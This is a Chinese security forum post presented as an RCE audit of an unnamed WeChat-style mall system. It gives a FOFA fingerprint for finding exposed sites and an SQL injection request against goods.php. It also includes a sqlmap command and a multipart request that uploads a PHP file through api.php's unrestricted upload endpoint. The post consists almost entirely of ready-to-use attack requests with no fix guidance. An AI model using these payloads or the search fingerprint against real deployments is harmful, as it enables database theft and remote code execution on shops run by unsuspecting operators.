某微商城系统RCE漏洞审计-网络安全论坛-网络安全-阻击者联盟

某微商城系统RCE漏洞审计

 微商城系统有优选,超值捡漏功能,人气销量,以及商家推荐功能,还有订单查询,智能客服等功能.

FoFa:

"/Mao_Public/js/jquery-2.1.1.min.js"

11714f8df2ea1bea848bc07b3ae4c8d2

0eb78e6af94ecad6d201ed53641a8bfb

 POC:

GET /goods.php?id='+UNION+ALL+SELECT+NULL,NULL,NULL,CONCAT(IFNULL(CAST(CURRENT_USER()+AS+NCHAR),0x20)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1
Cache-Control: no-cache
Cookie: PHPSESSID=2t6mrecrn4kesrguck8o1c1ohp
Host: 127.0.0.1
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

1723868057065

Sqlmap:

Python sqlmap.py -u "http://127.0.0.1/goods.php?id=*" --level=3 --dbms=mysql

任意文件上传:

Poc:

POST /api/api.php?mod=upload&type=1 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 196
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTqkdY1lCvbvpmown
Cookie: _ga=GA1.1.726509027.1723706258; _gid=GA1.1.511565798.1723706258; visiter_id=66becd1deegc38y28e1; cid=; services=1; itime=; service_token=fd70IOTMA6uf9x5ik%252FK%252Bp4E8K3BoyjlZd1eqHSIuOVum9qwpawRVCPE; think_lang=zh-cn; PHPSESSID=8954e10b597781256b751d2e72305b76
Host: 127.0.0.1
Origin: http://127.0.0.1
Referer: http://127.0.0.1/api/api.php?mod=upload&type=1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
sec-ch-ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-user: ?1

------WebKitFormBoundaryaKljzbg49Mq4ggLz
Content-Disposition: form-data; name="file"; filename="a.php"
Content-Type: image/png

<?php phpinfo();?>
------WebKitFormBoundaryaKljzbg49Mq4ggLz--

 

c0f73455bd6e53db7be2debc1164507f

6db3972cb9cb40c07829e2ff40fd6f06

 

请登录后发表评论

    没有回复内容